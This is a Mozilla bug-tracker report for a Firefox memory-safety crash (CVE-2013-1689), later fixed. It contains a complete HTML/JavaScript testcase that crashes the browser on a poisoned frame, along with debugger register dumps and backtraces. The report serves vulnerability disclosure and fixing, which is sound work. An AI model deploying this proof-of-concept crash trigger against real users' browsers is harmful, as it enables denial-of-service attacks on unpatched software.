Closed Bug 817219 (CVE-2013-1689) Opened 13 years ago Closed 12 years ago

Crash @xul!nsDOMEvent::GetTargetFromFrame on poison value

Categories

(Core :: Layout, defect)

Product:
Core
Component:
Layout
Platform:
x86_64
Linux
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
RESOLVED FIXED
Milestone:
mozilla22
Tracking Flags:
Tracking Status
firefox17 --- wontfix
firefox18 --- affected
firefox19 --- affected
firefox20 --- affected
firefox21 --- wontfix
firefox22 --- fixed
firefox-esr17 --- wontfix
b2g18 --- wontfix

People

(Reporter: nils, Assigned: MatsPalmgren_bugz)

References

Details

(4 keywords, Whiteboard: [fixed by bug 635852][adv-main22+])

Attachments

(2 files)

crash.html
117 bytes, text/plain
Details
crash.js (req'd by crash.html)
865 bytes, text/plain
Details
Attached file crash.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:20.0) Gecko/20.0 Firefox/20.0 Build ID: 20121126030823 Steps to reproduce: Description: The attached testcase crashes the browser, which seems to be related to event handling with frames. Crashes on a poison value, which indicates a potentially exploitable behaviour. Tested and Affected Versions: Firefox 20.0a1 (trunk) Firefox 17.0 Testcase: crash.html: <html> <script src="crash.js"></script> <script> window.setTimeout("start();", 10); </script> <body> </body> </html> crash.js: function start() { o3=document.createElement('input'); tmp = o3.ownerDocument.createElement('iframe'); document.body.appendChild(tmp); o4=tmp.contentDocument; cb_3=function() { var f = callback_3; callback_3 = null; return f(arguments); } o3.addEventListener('change', cb_3, false); o51=document.createElement('img'); o94=document.createElement('input'); o94.type='checkbox'; o3.appendChild(o94); o192=document.createElement('input'); o192.type='button'; o94.appendChild(o192); o263=document.createEvent('MouseEvents'); o263.initMouseEvent('click', true, true, window,0, 0, 0, 0, 0, false, false, false, false, 0, null); o192.dispatchEvent(o263) } function callback_3() { o192.addEventListener('DOMNodeRemoved', callback_21, true); o51.appendChild(o192); } function callback_21() { o4.documentElement.appendChild(o192); location.reload(); } When trying to include the Javascript code into the HTML it doesn't seem to be crashing on Windows. Both files are attached. Crash log on Linux: Program received signal SIGSEGV, Segmentation fault. 0xf68ba5a4 in nsWeakFrame::InitInternal(nsIFrame*) () from /home/fred/debugging/firefox/libxul.so (gdb) info reg eax 0x0 0 ecx 0xffffff80 -128 edx 0xf35017ff -212854785 ebx 0xf767adf8 -144200200 esp 0xfff7f150 0xfff7f150 ebp 0xfff7f168 0xfff7f168 esi 0xe17de3fc -511843332 edi 0xe775be68 -411713944 eip 0xf68ba5a4 0xf68ba5a4 <nsWeakFrame::InitInternal(nsIFrame*)+52> eflags 0x210282 [ SF IF RF ID ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99 (gdb) x/3i $eip => 0xf68ba5a4 <_ZN11nsWeakFrame12InitInternalEP8nsIFrame+52>: mov 0x1c(%edx),%eax 0xf68ba5a7 <_ZN11nsWeakFrame12InitInternalEP8nsIFrame+55>: mov (%eax),%edi 0xf68ba5a9 <_ZN11nsWeakFrame12InitInternalEP8nsIFrame+57>: mov 0xc(%edi),%eax (gdb) bt 20 #0 0xf68ba5a4 in nsWeakFrame::InitInternal(nsIFrame*) () from /home/fred/debugging/firefox/libxul.so #1 0xf6a07017 in nsEventStateManager::GetEventTarget() () from /home/fred/debugging/firefox/libxul.so #2 0xf6a0d830 in nsDOMEvent::GetTargetFromFrame() () from /home/fred/debugging/firefox/libxul.so #3 0xf6a0d8da in nsDOMEvent::InitPresContextData(nsPresContext*) () from /home/fred/debugging/firefox/libxul.so #4 0xf6a1595c in nsDOMBeforeUnloadEvent::nsDOMBeforeUnloadEvent(nsPresContext*, nsEvent*) () from /home/fred/debugging/firefox/libxul.so #5 0xf6a159e2 in NS_NewDOMBeforeUnloadEvent(nsIDOMEvent**, nsPresContext*, nsEvent*) () from /home/fred/debugging/firefox/libxul.so #6 0xf69a1c5e in nsDocument::CreateEvent(nsAString_internal const&, nsIDOMEvent**) () from /home/fred/debugging/firefox/libxul.so #7 0xf686f0b2 in nsDocumentViewer::PermitUnload(bool, bool*) () from /home/fred/debugging/firefox/libxul.so #8 0xf6d337da in nsDocShell::InternalLoad(nsIURI*, nsIURI*, nsISupports*, unsigned int, unsigned short const*, char const*, nsIInputStream*, nsIInputStream*, unsigned int, nsISHEntry*, bool, nsIDocShell**, nsIRequest**) () from /home/fred/debugging/firefox/libxul.so #9 0xf5f8377f in nsDocShell::LoadHistoryEntry(nsISHEntry*, unsigned int) () from /home/fred/debugging/firefox/libxul.so #10 0xf6d27b2b in nsDocShell::Reload(unsigned int) () from /home/fred/debugging/firefox/libxul.so #11 0xf5d90fea in nsLocation::Reload(bool) () from /home/fred/debugging/firefox/libxul.so #12 0xf6eda590 in NS_InvokeByIndex_P () from /home/fred/debugging/firefox/libxul.so #13 0xf6cecc6a in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) () from /home/fred/debugging/firefox/libxul.so #14 0xf6cf37ac in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) () from /home/fred/debugging/firefox/libxul.so #15 0xf709f156 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) () from /home/fred/debugging/firefox/libxul.so #16 0xf709321a in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) () from /home/fred/debugging/firefox/libxul.so #17 0xf7153545 in js::mjit::EnterMethodJIT(JSContext*, js::StackFrame*, void*, JS::Value*, bool) () from /home/fred/debugging/firefox/libxul.so #18 0xf7153649 in js::mjit::JaegerShot(JSContext*, bool) () from /home/fred/debugging/firefox/libxul.so #19 0xf709ea30 in js::RunScript(JSContext*, JS::Handle<JSScript*>, js::StackFrame*) () from /home/fred/debugging/firefox/libxul.so Crash log on Windows: xul!nsDOMEvent::GetTargetFromFrame+0x137d3e xul!nsDOMEvent::nsDOMEvent+0xbc xul!NS_NewDOMBeforeUnloadEvent+0x1d xul!nsEventDispatcher::CreateEvent+0x36f xul!nsHTMLDocument::CreateEvent+0x38 xul!DocumentViewerImpl::PermitUnload+0xbb xul!nsDocShell::InternalLoad+0x5f8 xul!nsDocShell::LoadHistoryEntry+0x256 xul!nsDocShell::Reload+0xd6 xul!nsLocation::Reload+0x39 xul!NS_InvokeByIndex_P+0x27 xul!XPCWrappedNative::CallMethod+0x319 xul!XPC_WN_CallMethod+0xaa mozjs!js::InvokeKernel+0x59 mozjs!js::Interpret+0x6ce4 mozjs!js::RunScript+0x415 mozjs!js::InvokeKernel+0x250 mozjs!js::Invoke+0x128 mozjs!JS_CallFunctionValue+0x41 xul!nsXPCWrappedJSClass::CallMethod+0x488 xul!nsDOMEvent::GetTargetFromFrame+0x137d3e: 6ff5b80e 8b511c mov edx,dword ptr [ecx+1Ch] ds:002b:f0de801b=???????? reported by nils of vulndev ltd.
Component: DOM: Events → Layout
bp-391d1522-1a30-40b0-9435-e988b2121208 Confirming the crash on a poisoned frame. So far no one has found a bypass for the poisoning mitigation so exploitability seems unlikely.
Status: UNCONFIRMED → NEW
status-firefox17: --- → wontfix
status-firefox18: --- → affected
status-firefox19: --- → affected
status-firefox20: --- → affected
Ever confirmed: true
Keywords: crash, csec-dos, sec-low, testcase
The latest patch in bug 635852 fixes this.
Assignee: nobody → matspal
Depends on: 635852
Severity: normal → critical
Status: NEW → RESOLVED
Closed: 12 years ago
status-firefox21: --- → affected
Flags: in-testsuite?
Resolution: --- → FIXED
Whiteboard: [fixed by bug 635852]
Target Milestone: --- → mozilla22
Whiteboard: [fixed by bug 635852] → [fixed by bug 635852][adv-main22+]
Alias: CVE-2013-1689
https://hg.mozilla.org/integration/mozilla-inbound/rev/4af6737ce10b
Group: core-security
Flags: in-testsuite? → in-testsuite+
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: